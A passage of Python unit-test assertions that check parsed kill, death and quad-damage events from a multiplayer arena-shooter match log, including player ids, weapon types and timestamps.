assert e[51]['DATA']['KILLER']['NAME'] is None # noqa
assert e[51]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[51]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[51]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[51]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[51]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[51]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[51]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[51]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[51]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[51]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[51]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[51]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[51]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[51]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[51]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[51]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[51]['DATA']['ROUND'] is None # noqa
assert e[51]['DATA']['SUICIDE'] is None # noqa
assert e[51]['DATA']['TEAMKILL'] is None # noqa
assert e[51]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[51]['DATA']['TEAM_DEAD'] is None # noqa
assert e[51]['DATA']['TIME'] == 180.1 # noqa
assert e[51]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[51]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[51]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[51]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[51]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[51]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[51]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[51]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[51]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[51]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[51]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[51]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[51]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[51]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[51]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[51]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[51]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[51]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[51]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[51]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[51]['DATA']['WARMUP'] == False # noqa
assert e[51]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[52]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[52]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[52]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[52]['DATA']['KILLER']['BOT'] is None # noqa
assert e[52]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[52]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[52]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[52]['DATA']['KILLER']['NAME'] is None # noqa
assert e[52]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[52]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[52]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[52]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[52]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[52]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[52]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[52]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[52]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[52]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[52]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[52]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[52]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[52]['DATA']['MOD'] == 'GAUNTLET' # noqa
assert e[52]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[52]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[52]['DATA']['ROUND'] is None # noqa
assert e[52]['DATA']['SUICIDE'] is None # noqa
assert e[52]['DATA']['TEAMKILL'] is None # noqa
assert e[52]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[52]['DATA']['TEAM_DEAD'] is None # noqa
assert e[52]['DATA']['TIME'] == 190.5 # noqa
assert e[52]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[52]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[52]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[52]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[52]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[52]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[52]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[52]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[52]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[52]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[52]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[52]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[52]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[52]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[52]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[52]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[52]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[52]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[52]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[52]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[52]['DATA']['WARMUP'] == False # noqa
assert e[52]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[53]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[53]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[53]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[53]['DATA']['KILLER']['BOT'] is None # noqa
assert e[53]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[53]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[53]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[53]['DATA']['KILLER']['NAME'] is None # noqa
assert e[53]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[53]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[53]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[53]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[53]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[53]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[53]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[53]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[53]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[53]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[53]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[53]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[53]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[53]['DATA']['MOD'] == 'GAUNTLET' # noqa
assert e[53]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[53]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[53]['DATA']['ROUND'] is None # noqa
assert e[53]['DATA']['SUICIDE'] is None # noqa
assert e[53]['DATA']['TEAMKILL'] is None # noqa
assert e[53]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[53]['DATA']['TEAM_DEAD'] is None # noqa
assert e[53]['DATA']['TIME'] == 190.5 # noqa
assert e[53]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[53]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[53]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[53]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[53]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[53]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[53]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[53]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[53]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[53]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[53]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[53]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[53]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[53]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[53]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[53]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[53]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[53]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[53]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[53]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[53]['DATA']['WARMUP'] == False # noqa
assert e[53]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[54]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[54]['DATA']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[54]['DATA']['TIME'] == 195.3 # noqa
assert e[54]['DATA']['WARMUP'] == False # noqa
assert e[54]['TYPE'] == 'PLAYER_QUAD' # noqa
assert e[55]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[55]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[55]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[55]['DATA']['KILLER']['BOT'] is None # noqa
assert e[55]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[55]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[55]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[55]['DATA']['KILLER']['NAME'] is None # noqa
assert e[55]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[55]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[55]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[55]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[55]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[55]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[55]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[55]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[55]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[55]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[55]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[55]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[55]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[55]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[55]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[55]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[55]['DATA']['ROUND'] is None # noqa
assert e[55]['DATA']['SUICIDE'] is None # noqa
assert e[55]['DATA']['TEAMKILL'] is None # noqa
assert e[55]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[55]['DATA']['TEAM_DEAD'] is None # noqa
assert e[55]['DATA']['TIME'] == 202.1 # noqa
assert e[55]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[55]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[55]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[55]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[55]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[55]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[55]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[55]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[55]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[55]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[55]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[55]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[55]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[55]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[55]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[55]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[55]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[55]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[55]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[55]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[55]['DATA']['WARMUP'] == False # noqa
assert e[55]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[56]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[56]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[56]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[56]['DATA']['KILLER']['BOT'] is None # noqa
assert e[56]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[56]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[56]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[56]['DATA']['KILLER']['NAME'] is None # noqa
assert e[56]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[56]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[56]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[56]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[56]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[56]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[56]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[56]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[56]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[56]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[56]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[56]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[56]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[56]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[56]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[56]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[56]['DATA']['ROUND'] is None # noqa
assert e[56]['DATA']['SUICIDE'] is None # noqa
assert e[56]['DATA']['TEAMKILL'] is None # noqa
assert e[56]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[56]['DATA']['TEAM_DEAD'] is None # noqa
assert e[56]['DATA']['TIME'] == 202.1 # noqa
assert e[56]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[56]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[56]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[56]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[56]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[56]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[56]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[56]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[56]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[56]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[56]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[56]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[56]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[56]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[56]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[56]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[56]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[56]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[56]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[56]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[56]['DATA']['WARMUP'] == False # noqa
assert e[56]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[57]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[57]['DATA']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[57]['DATA']['TIME'] == 208.2 # noqa
assert e[57]['DATA']['WARMUP'] == False # noqa
assert e[57]['TYPE'] == 'PLAYER_QUAD' # noqa
assert e[58]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[58]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[58]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[58]['DATA']['KILLER']['BOT'] is None # noqa
assert e[58]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[58]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[58]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[58]['DATA']['KILLER']['NAME'] is None # noqa
assert e[58]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[58]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[58]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[58]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[58]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[58]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[58]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[58]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[58]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[58]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[58]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[58]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[58]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[58]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[58]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[58]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[58]['DATA']['ROUND'] is None # noqa
assert e[58]['DATA']['SUICIDE'] is None # noqa
assert e[58]['DATA']['TEAMKILL'] is None # noqa
assert e[58]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[58]['DATA']['TEAM_DEAD'] is None # noqa
assert e[58]['DATA']['TIME'] == 209.2 # noqa
assert e[58]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[58]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[58]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[58]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[58]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[58]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[58]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[58]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[58]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[58]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[58]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[58]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[58]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[58]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[58]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[58]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[58]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[58]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[58]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[58]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[58]['DATA']['WARMUP'] == False # noqa
assert e[58]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[59]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[59]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[59]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[59]['DATA']['KILLER']['BOT'] is None # noqa
assert e[59]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[59]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[59]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[59]['DATA']['KILLER']['NAME'] is None # noqa
assert e[59]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[59]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[59]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[59]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[59]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[59]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[59]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[59]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[59]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[59]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[59]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[59]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[59]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[59]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[59]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[59]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[59]['DATA']['ROUND'] is None # noqa
assert e[59]['DATA']['SUICIDE'] is None # noqa
assert e[59]['DATA']['TEAMKILL'] is None # noqa
assert e[59]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[59]['DATA']['TEAM_DEAD'] is None # noqa
assert e[59]['DATA']['TIME'] == 209.2 # noqa
assert e[59]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[59]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[59]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[59]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[59]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[59]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[59]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[59]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[59]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[59]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[59]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[59]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[59]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[59]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[59]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[59]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[59]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[59]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[59]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[59]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[59]['DATA']['WARMUP'] == False # noqa
assert e[59]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[60]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[60]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[60]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[60]['DATA']['KILLER']['BOT'] is None # noqa
assert e[60]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[60]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[60]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[60]['DATA']['KILLER']['NAME'] is None # noqa
assert e[60]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[60]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[60]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[60]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[60]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[60]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[60]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[60]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[60]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[60]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[60]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[60]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[60]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[60]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[60]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[60]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[60]['DATA']['ROUND'] is None # noqa
assert e[60]['DATA']['SUICIDE'] is None # noqa
assert e[60]['DATA']['TEAMKILL'] is None # noqa
assert e[60]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[60]['DATA']['TEAM_DEAD'] is None # noqa
assert e[60]['DATA']['TIME'] == 220.8 # noqa
assert e[60]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[60]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[60]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[60]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[60]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[60]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[60]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[60]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[60]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[60]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[60]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[60]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[60]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[60]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[60]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[60]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[60]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[60]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[60]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[60]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[60]['DATA']['WARMUP'] == False # noqa
assert e[60]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[61]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[61]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[61]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[61]['DATA']['KILLER']['BOT'] is None # noqa
assert e[61]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[61]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[61]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[61]['DATA']['KILLER']['NAME'] is None # noqa
assert e[61]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[61]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[61]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[61]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[61]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[61]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[61]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[61]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[61]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[61]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[61]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[61]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[61]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[61]['DATA']['MOD'] == 'LIGHTNING' # noqa
